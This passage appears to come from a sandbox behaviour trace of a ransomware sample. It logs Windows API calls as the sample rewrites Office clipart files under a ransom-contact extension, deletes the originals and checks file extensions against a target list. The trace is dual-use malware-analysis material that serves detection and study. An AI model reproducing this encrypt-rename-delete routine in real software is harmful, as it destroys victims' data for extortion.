lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.353] GetLastError () returned 0x0 [0066.353] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2332, lpOverlapped=0x0) returned 1 [0066.372] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2340, lpOverlapped=0x0) returned 1 [0066.375] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.375] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.375] SetEndOfFile (hFile=0x368) returned 1 [0066.375] CloseHandle (hObject=0x368) returned 1 [0066.375] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.375] SetEndOfFile (hFile=0x354) returned 1 [0066.376] CloseHandle (hObject=0x354) returned 1 [0066.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf")) returned 1 [0066.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 68 [0066.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 68 [0066.377] lstrlenW (lpString=".doc") returned 4 [0066.377] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.377] lstrlenW (lpString=".docx") returned 5 [0066.377] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.377] lstrlenW (lpString=".pdf") returned 4 [0066.377] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.377] lstrlenW (lpString=".xls") returned 4 [0066.378] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.378] lstrlenW (lpString=".xlsx") returned 5 [0066.378] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.378] lstrlenW (lpString=".ppt") returned 4 [0066.378] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 68 [0066.378] lstrlenW (lpString=".zip") returned 4 [0066.378] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.378] lstrlenW (lpString=".rar") returned 4 [0066.378] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.378] lstrlenW (lpString=".bz2") returned 4 [0066.378] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.378] lstrlenW (lpString=".7z") returned 3 [0066.378] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 68 [0066.378] lstrlenW (lpString=".dbf") returned 4 [0066.378] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 68 [0066.378] lstrlenW (lpString=".1cd") returned 4 [0066.378] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 68 [0066.378] lstrlenW (lpString=".jpg") returned 4 [0066.378] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.397] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.397] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0066.398] GetLastError () returned 0x0 [0066.398] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa6d0, lpOverlapped=0x0) returned 1 [0066.459] WriteFile (in: hFile=0x388, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa6e0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa6e0, lpOverlapped=0x0) returned 1 [0066.461] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.461] WriteFile (in: hFile=0x388, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.461] SetEndOfFile (hFile=0x388) returned 1 [0066.463] CloseHandle (hObject=0x388) returned 1 [0066.465] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.465] SetEndOfFile (hFile=0x370) returned 1 [0066.477] CloseHandle (hObject=0x370) returned 1 [0066.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf")) returned 1 [0066.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 68 [0066.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 68 [0066.478] lstrlenW (lpString=".doc") returned 4 [0066.478] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.478] lstrlenW (lpString=".docx") returned 5 [0066.478] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.478] lstrlenW (lpString=".pdf") returned 4 [0066.478] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.478] lstrlenW (lpString=".xls") returned 4 [0066.478] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.478] lstrlenW (lpString=".xlsx") returned 5 [0066.478] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.478] lstrlenW (lpString=".ppt") returned 4 [0066.478] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 68 [0066.478] lstrlenW (lpString=".zip") returned 4 [0066.478] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.478] lstrlenW (lpString=".rar") returned 4 [0066.478] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.478] lstrlenW (lpString=".bz2") returned 4 [0066.478] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.478] lstrlenW (lpString=".7z") returned 3 [0066.478] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 68 [0066.479] lstrlenW (lpString=".dbf") returned 4 [0066.479] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 68 [0066.479] lstrlenW (lpString=".1cd") returned 4 [0066.479] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 68 [0066.479] lstrlenW (lpString=".jpg") returned 4 [0066.479] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.480] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.480] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.480] GetLastError () returned 0x0 [0066.480] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x284c, lpOverlapped=0x0) returned 1 [0066.487] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2850, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2850, lpOverlapped=0x0) returned 1 [0066.488] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.488] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.488] SetEndOfFile (hFile=0x368) returned 1 [0066.488] CloseHandle (hObject=0x368) returned 1 [0066.488] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.488] SetEndOfFile (hFile=0x370) returned 1 [0066.489] CloseHandle (hObject=0x370) returned 1 [0066.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.490] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf")) returned 1 [0066.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 68 [0066.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 68 [0066.490] lstrlenW (lpString=".doc") returned 4 [0066.490] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.490] lstrlenW (lpString=".docx") returned 5 [0066.490] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.490] lstrlenW (lpString=".pdf") returned 4 [0066.490] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.490] lstrlenW (lpString=".xls") returned 4 [0066.490] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.490] lstrlenW (lpString=".xlsx") returned 5 [0066.490] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.490] lstrlenW (lpString=".ppt") returned 4 [0066.490] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 68 [0066.490] lstrlenW (lpString=".zip") returned 4 [0066.490] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.490] lstrlenW (lpString=".rar") returned 4 [0066.490] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.490] lstrlenW (lpString=".bz2") returned 4 [0066.491] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.491] lstrlenW (lpString=".7z") returned 3 [0066.491] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 68 [0066.491] lstrlenW (lpString=".dbf") returned 4 [0066.491] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 68 [0066.491] lstrlenW (lpString=".1cd") returned 4 [0066.491] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 68 [0066.491] lstrlenW (lpString=".jpg") returned 4 [0066.491] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.491] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.491] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.492] GetLastError () returned 0x0 [0066.492] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4604, lpOverlapped=0x0) returned 1 [0066.502] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4610, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4610, lpOverlapped=0x0) returned 1 [0066.503] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.503] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.503] SetEndOfFile (hFile=0x368) returned 1 [0066.504] CloseHandle (hObject=0x368) returned 1 [0066.504] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.504] SetEndOfFile (hFile=0x370) returned 1 [0066.505] CloseHandle (hObject=0x370) returned 1 [0066.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.505] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf")) returned 1 [0066.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 68 [0066.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 68 [0066.505] lstrlenW (lpString=".doc") returned 4 [0066.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.505] lstrlenW (lpString=".docx") returned 5 [0066.505] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.505] lstrlenW (lpString=".pdf") returned 4 [0066.505] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.505] lstrlenW (lpString=".xls") returned 4 [0066.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.505] lstrlenW (lpString=".xlsx") returned 5 [0066.505] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.505] lstrlenW (lpString=".ppt") returned 4 [0066.505] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 68 [0066.506] lstrlenW (lpString=".zip") returned 4 [0066.506] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.506] lstrlenW (lpString=".rar") returned 4 [0066.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.506] lstrlenW (lpString=".bz2") returned 4 [0066.506] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.506] lstrlenW (lpString=".7z") returned 3 [0066.506] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 68 [0066.506] lstrlenW (lpString=".dbf") returned 4 [0066.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 68 [0066.506] lstrlenW (lpString=".1cd") returned 4 [0066.506] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 68 [0066.506] lstrlenW (lpString=".jpg") returned 4 [0066.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.506] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.506] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.507] GetLastError () returned 0x0 [0066.507] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x329e, lpOverlapped=0x0) returned 1 [0066.508] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x32a0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x32a0, lpOverlapped=0x0) returned 1 [0066.509] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.509] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.509] SetEndOfFile (hFile=0x368) returned 1 [0066.510] CloseHandle (hObject=0x368) returned 1 [0066.510] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.510] SetEndOfFile (hFile=0x370) returned 1 [0066.510] CloseHandle (hObject=0x370) returned 1 [0066.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf")) returned 1 [0066.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 68 [0066.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 68 [0066.511] lstrlenW (lpString=".doc") returned 4 [0066.511] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.511] lstrlenW (lpString=".docx") returned 5 [0066.511] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.511] lstrlenW (lpString=".pdf") returned 4 [0066.511] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.511] lstrlenW (lpString=".xls") returned 4 [0066.511] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.511] lstrlenW (lpString=".xlsx") returned 5 [0066.511] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.511] lstrlenW (lpString=".ppt") returned 4 [0066.511] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 68 [0066.511] lstrlenW (lpString=".zip") returned 4 [0066.511] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.511] lstrlenW (lpString=".rar") returned 4 [0066.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.512] lstrlenW (lpString=".bz2") returned 4 [0066.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.512] lstrlenW (lpString=".7z") returned 3 [0066.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 68 [0066.512] lstrlenW (lpString=".dbf") returned 4 [0066.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 68 [0066.512] lstrlenW (lpString=".1cd") returned 4 [0066.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 68 [0066.512] lstrlenW (lpString=".jpg") returned 4 [0066.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.512] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.512] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.513] GetLastError () returned 0x0 [0066.513] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x9b8, lpOverlapped=0x0) returned 1 [0066.514] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x9c0, lpOverlapped=0x0) returned 1 [0066.515] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.515] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.515] SetEndOfFile (hFile=0x368) returned 1 [0066.516] CloseHandle (hObject=0x368) returned 1 [0066.516] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.516] 